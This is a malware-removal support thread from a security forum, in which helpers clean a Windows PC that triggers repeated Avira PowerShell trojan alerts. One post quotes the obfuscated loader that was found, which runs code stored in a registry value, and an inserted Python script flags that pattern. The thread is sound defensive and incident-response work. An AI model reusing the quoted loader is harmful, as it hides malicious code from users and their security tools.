A running process on your device is potentially malicious

Solved by AdvancedSetup

Avira security on windows 11 keeps alerting this every few seconds (started today). How can I find out what's causing this?

This is the message:

Suspicious behavior blocked
Item name: memorybuffer.f00df41003e9a3b48...
Threat name: TR/PShell.Agent.VPO
Type: Trojan
Status: Blocked
A running process on your device is potentially malicious and has been blocked.

 

Attachment: malware.png


@ramiwi

Let's get the info to get the process started.

Please do the following so that we may take a closer look at your system for any possible infections.

Do these 2 steps so that ALL folders & files are set to SHOW, and also turn OFF Windows Fast Startup.
Show-Hidden-Folders-Files-Extensions
https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/

Disable-Fast-Startup
https://forums.malwarebytes.com/topic/299350-disable-fast-startup/

Then please restart the computer and do the following.

WARNING: Do Not click the Repair option under Advanced unless requested by a Malwarebytes support agent or authorized helper

NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

  • Download the Malwarebytes Support Tool
  • In your Downloads folder, open the mb-support-x.x.x.xxx.exe file
  • In the User Account Control pop-up window, click Yes to continue the installation
  • Run the MBST Support Tool
  • In the left navigation pane of the Malwarebytes Support Tool, click Advanced
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine
  • A zip file named mbst-grab-results.zip will be saved to the Desktop or on the hidden Public desktop (usually C:\Users\Public\Desktop), please upload that file on your next reply

     

Thank you


@Porthos Thanks! My results are attached.

I ran the diag tool right after booting up (I didn't have the Fast Startup checkbox in the unavailable settings; maybe I disabled it in my BIOS in the past).
The alerts only started about an hour after booting, and then kept popping up every few seconds. So it was quiet when the tool was working. I can send another report when they start to pop up again.

The previous reply (from Said) is not related to me.

 

Attachment: mbst-grab-results.zip


  • Root Admin

Give me a moment to write up a fix for you @ramiwi

In the meantime, please do the following:

[ 1 ]

ATTENTION: System Restore is disabled (Total:300 GB) (Free:28.8 GB) (10%)

Please enable and create a new System Restore Point

Turn On or Off System Protection for Drives in Windows 11
https://www.elevenforum.com/t/turn-on-or-off-system-protection-for-drives-in-windows-11.3598/

Create System Restore Point in Windows 11
https://www.elevenforum.com/t/create-system-restore-point-in-windows-11.3602/


[ 2 ]

Please go to Control Panel, Programs, Programs and Features, Uninstall a program

Then right-click and uninstall the following

  • Java 8 Update 241

 

[ 3 ]

Please see the following for reference only

Class-action lawsuit against antivirus firm for selling data


  • Root Admin
  • Solution

Please run the following fix

 

Make sure you temporarily disable the Avira antivirus real-time protection first

 

NOTE: Please read all of the information below before running this fix.

  • NOTICE: This script was written specifically for this user, for use on this particular machine.
  • Running this on another machine may cause damage to your operating system that cannot be undone.

Once the fix has been completed, please attach the file FIXLOG.TXT to your next reply

Farbar program:   FRSTEnglish.exe

Save the attached file:  FIXLIST.TXT to this folder C:\Users\rami_\Downloads\

NOTE. It's important that both files, FRSTEnglish.exe, and fixlist.txt are in the same location or the fix will not work.

Please make sure you disable any real-time antivirus or security software before running this script. Once completed, make sure you re-enable it.

 

 

Run the Farbar program with Admin rights and press the Fix button just once and wait.

The fix may possibly take up to 60 minutes to complete

If the tool needs a restart please make sure you let the system restart normally and let the tool complete its run after restart.
The tool will make a log named Fixlog.txt in the same folder you ran the Farbar program from. Please attach that log on your next reply.

 

  1. NOTE:  This fix will run a scan to check that all Microsoft operating system files are valid and not corrupt and attempt to correct any invalid files. It will also run a disk check on the restart to ensure disk integrity.
  2. NOTE: As part of this fix all temporary files will be removed. If you have any open web pages that have not been bookmarked please make sure you bookmark them now as all open applications may be automatically closed. Also, make sure you know the passwords for all websites as cookies may possibly be removed in some cases, but not all cases.
  3. NOTE: As part of this fix, it will also reset the network to default settings including the firewall. If you have custom firewall rules you need to save please export or save them first before running this fix.

The following directories are emptied:

  • Windows Temp
  • Users Temp folders
  • Edge, IE, FF, Chrome, and Opera caches, HTML5 storages, Cookies and History
  • Recently opened files cache
  • Discord cache
  • Java cache
  • Steam HTML cache
  • Explorer thumbnail and icon cache
  • BITS transfer queue (qmgr*.dat files)
  • Recycle Bin

Important: items are permanently deleted. They are not moved to quarantine. If you have any questions or concerns please ask before running this fix.

The system will be rebooted after the fix has run.

Attachment: fixlist.txt

Thanks


 

Many thanks! So far the alert seems to be gone.

 

That PowerShell script appears to be suspicious

C:\WINDOWS\System32\375263BC-272F-4C89-877F-092DB6A60857.ps1

$LFSXIEJqQd=[ScriptBlock];$lhcOGyDfZLnqCQ=[string];$CJbdVcGDfEVbV=[char]; icm ($LFSXIEJqQd::Create($lhcOGyDfZLnqCQ::Join('', ((gp 'HKLM:\SOFTWARE\7-ZipAA8xK7ht').'SLrPhfxtl3w' | % { [char]$_ }))))

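Added example, not from the thread or from any of the tools it mentions: a small Python triage helper that does statically what an analyst would do with the one-liner quoted above. It resolves the `$variable=[Type]` aliases, flags the registry-read, byte-to-char, `ScriptBlock::Create` and invoke chain, and pulls out the registry key and value name that should be inspected and removed. The key and value names in the sample are the ones quoted in the post; the integer list passed to `decode_payload` is a constructed stand-in for a dumped registry value.

```python
import re

# Constructed sample: the one-liner quoted in the post above, as a raw string
SAMPLE = (r"$LFSXIEJqQd=[ScriptBlock];$lhcOGyDfZLnqCQ=[string];$CJbdVcGDfEVbV=[char]; "
          r"icm ($LFSXIEJqQd::Create($lhcOGyDfZLnqCQ::Join('', "
          r"((gp 'HKLM:\SOFTWARE\7-ZipAA8xK7ht').'SLrPhfxtl3w' | % { [char]$_ }))))")

# $var=[Type]; assignments used to hide which .NET types are being called
ALIAS_RE = re.compile(r"\$(\w+)\s*=\s*\[(\w+)\]\s*;")
# (gp 'HKLM:\...').'ValueName'  or  (Get-ItemProperty 'HKLM:\...').'ValueName'
REG_RE = re.compile(r"\((?:gp|Get-ItemProperty)\s+'([^']+)'\)\.'([^']+)'", re.I)


def resolve_type_aliases(script: str) -> str:
    """Replace $alias:: with [Type]:: so the static calls read as written."""
    out = script
    for alias, typ in ALIAS_RE.findall(script):
        out = re.sub(r"\$" + re.escape(alias) + r"::", f"[{typ}]::", out)
    return out


def triage(script: str) -> dict:
    """Flag the registry-resident loader pattern and report where it reads its payload from."""
    plain = resolve_type_aliases(script)
    indicators = []
    if re.search(r"\[ScriptBlock\]::Create\(", plain):
        indicators.append("scriptblock-create")  # turns a string into runnable code
    if re.search(r"\b(icm|Invoke-Command|iex|Invoke-Expression)\b", plain, re.I):
        indicators.append("dynamic-invoke")  # runs that code
    if re.search(r"\[char\]\s*\$_", plain):
        indicators.append("byte-to-char")  # decodes a numeric blob into text
    m = REG_RE.search(plain)
    registry = {"key": m.group(1), "value": m.group(2)} if m else None
    if registry:
        indicators.append("registry-payload")  # payload lives in a registry value, not a file
    return {"suspicious": len(indicators) >= 3, "indicators": indicators, "registry": registry}


def decode_payload(values) -> str:
    """Apply the loader's own decoding step (one char per stored integer) to a dumped value."""
    return "".join(chr(v) for v in values)


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it over any .ps1 found in an unexpected location; a hit gives you the registry key and value to export for analysis before the cleanup removes them.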

  • Root Admin

Thank you for the log. It ran pretty well and also found and fixed other issues.

Windows Resource Protection found corrupt files and successfully repaired them.

 

SecurityCheck by glax24


I would like you to run a tool named SecurityCheck to inquire about the current security update status of some applications.
SecurityCheck is a utility for quickly checking for the presence of vulnerable applications.

  • Temporarily disable Microsoft SmartScreen to download the software
  • Download SecurityCheck by glax24: https://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe
  • If SmartScreen blocks the file from running click on More info and Run anyway
  • This tool is safe.   Smartscreen is overly sensitive. You can check the VirusTotal scan of the tool from here
  • Right-click with your mouse on SecurityCheck.exe and select "Run as administrator", and reply YES to allow it to run & go forward
  • Wait for the scan to finish. It will open a text file named SecurityCheck.txt. Close the file. Attach it with your next reply.
  • You can find this file in a folder called SecurityCheck: C:\SecurityCheck\SecurityCheck.txt

Checked parameters:

  1. User Account Control (UAC).
  2. Service pack.
  3. IE version.
  4. Automatic OS update. Sets of critical KB patches when updating is disabled.
  5. Antivirus, firewall, other security utilities.
  6. Versions of Java, Oracle Virtualbox.
  7. Version of Adobe Flash Player, Adobe AIR.
  8. Versions of Adobe Reader, Acrobat Reader DC, Foxit Reader.
  9. Versions of media players (iTunes, AIMP, foobar2000).
  10. Versions of messengers (Skype, Pidgin).
  11. Versions of installed browsers (Chrome, Opera, Firefox, Yandex, SeaMonkey).
  12. Versions of mail programs (The Bat, Thunderbird).
  13. Checking running processes and security program services
  14. Searching for installed Adware programs and optimizer programs (More than 5000).

Thank you


  • Root Admin

Please make a new System Restore Point first

Then uninstall, update, or otherwise address the following as appropriate for your computer.

 

7-Zip 22.00 (x64) v.22.00 Warning! Download Update | Uninstall old version and install new one.
Adobe Creative Cloud v.3.9.0.327 Warning! Download Update
Audacity 3.0.2 v.3.0.2 Warning! Download Update
calibre 64bit v.6.9.0 Warning! Download Update
FileZilla 3.62.2 v.3.62.2 Warning! Download Update
foobar2000 v1.6.16 v.1.6.16 Warning! Download Update
GIMP 2.10.14 v.2.10.14 Warning! Download Update
IrfanView 4.53 (64-bit) v.4.53 Warning! Download Update
Microsoft Visual Studio Code (User) v.1.82.2 Warning! Download Update
Mozilla Thunderbird 78.7.1 (x86 en-US) v.78.7.1 Warning! Download Update
Node.js v.18.12.1 Warning! Download Update
Oracle VM VirtualBox 6.1.38 v.6.1.38 Warning! Download Update
PuTTY release 0.76 (64-bit) v.0.76.0.0 Warning! Download Update
Python 2.7.15 (64-bit) v.2.7.15150 Warning! Download Update
Python 3.11.3 (64-bit) v.3.11.3150.0 Warning! Download Update
Python 3.8.1 (32-bit) v.3.8.1150.0 Warning! Download Update
Python 3.8.5 (64-bit) v.3.8.5150.0 Warning! Download Update
qBittorrent v.4.5.4 Warning! Download Update
Signal 5.29.1 v.5.29.1 Warning! Download Update
TeamViewer v.15.40.8 Warning! Download Update
WinRAR 5.71 (64-bit) v.5.71.0 Warning! Download Update

 

Please see the following for reference
https://forums.malwarebytes.com/topic/303753-class-action-lawsuit-against-antivirus-firm-for-selling-data/

---------------------------- [ UnwantedApps ] -----------------------------
Avira System Speedup v.6.26.0.18 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer.

 

 

Then RESTART the computer and check for Windows Updates and install any found.

 

Let me know if there are still any signs of infection or other issues after these updates.

 

Thank you

 


  • 3 weeks later...
  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks
